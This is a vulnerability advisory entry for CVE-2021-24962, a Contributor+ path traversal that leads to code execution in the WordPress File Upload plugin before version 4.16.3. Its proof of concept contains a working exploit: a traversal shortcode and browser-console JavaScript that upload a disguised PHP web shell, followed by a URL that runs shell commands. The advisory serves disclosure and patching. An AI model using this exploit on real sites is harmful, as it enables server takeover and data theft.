WordPress Plugin Vulnerabilities

WordPress File Upload < 4.16.3 - Contributor+ Path Traversal to RCE

Description

The plugin allows users with a role as low as Contributor to perform path traversal via a shortcode argument, which can then be used to upload a PHP code disguised as an image inside the auto-loaded directory of the plugin, resulting in arbitrary code execution.

Proof of Concept

As a contributor (or above), add the following shortcode to a post: [wordpress_file_upload placements="webcam" webcam="true" imagename="/../plugins/wp-file-upload/lib/"]

Then preview/view the post and run the below command (replacing all example.com by the correct domain) in the web developer console

session=GlobalData.WFU[1].session;
nonce=wfu_uploader_nonce_1.value;
params_index=GlobalData.WFU[1].params_index;
unique_id="whateverid";
filename="a.jpg"
filenames=wfu_plugin_encode_string("a.jpg");
payload="<?=`$_GET[shellcommand]`?>"
fd=new FormData();
Object.entries({
    'action': 'wfu_ajax_action',
    'wfu_uploader_nonce': nonce,
    'uploadedfile_1_index': '0',
    'uploadedfile_1_name': filenames,
    'uploadedfile_1_size': payload.length,
    'uniqueuploadid_1': unique_id,
    'params_index': params_index,
    'subdir_sel_index': '-1',
    'nofileupload_1': '0',
    'only_check': '0',
    'session_token': session
}).forEach(o=>fd.set.apply(fd, o));
fd.set("uploadedfile_1", new File([payload], filename, {type:"image/jpeg"}));
jQuery.post("https://example.com/wp-admin/admin-ajax.php",{
    'action': 'wfu_ajax_action_ask_server',
    'session_token': session,
    'sid': '1',
    'unique_id': unique_id,
    'wfu_uploader_nonce': nonce,
    'filenames': filenames,
    'filesizes': payload.length
}).then(()=>fetch("https://example.com/wp-admin/admin-ajax.php",{method:"POST",body:fd})).then(()=>jQuery.post("https://example.com/wp-admin/admin-ajax.php",{
'action': 'wfu_ajax_action',
    'wfu_uploader_nonce': nonce,
    'uniqueuploadid_1': unique_id,
    'params_index': params_index,
    'session_token': session,
    'upload_finished': '1'
}))

Then go to https://example.com/wp-admin/?shellcommand=calc

Affects Plugins

Plugin icon
wp-file-upload
Fixed in 4.16.3
Plugin icon
wordpress-file-upload-pro
Fixed in 4.16.3

References

CVE
CVE-2021-24962
URL
https://plugins.trac.wordpress.org/changeset/2677722

Classification

Type
TRAVERSAL
OWASP top 10
A1: Injection
CWE
CWE-22
CVSS
9.9 (critical)

Miscellaneous

Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
WPVDB ID
7a95b3f2-285e-40e3-aead-41932c207623

Timeline

Publicly Published
2022-03-01 (about 2 years ago)
Added
2022-03-01 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)

Other

Published
Title
Published
2017-05-11
Title
Delightful Downloads <= 1.6.6 - Unauthenticated Path Traversal
Published
2023-03-20
Title
All-In-One Security (AIOS) < 5.1.5 - Admin+ Arbitrary File/Folder Access via Traversal
Published
2024-01-03
Title
WP Compress < 6.10.34 - Unauthenticated Arbitrary File Read
Published
2021-12-14
Title
True Ranker < 2.2.4 - Unauthenticated Arbitrary File Access via Path Traversal
Published
2023-03-27
Title
Photo Gallery by 10Web < 1.8.15 - Admin+ Path Traversal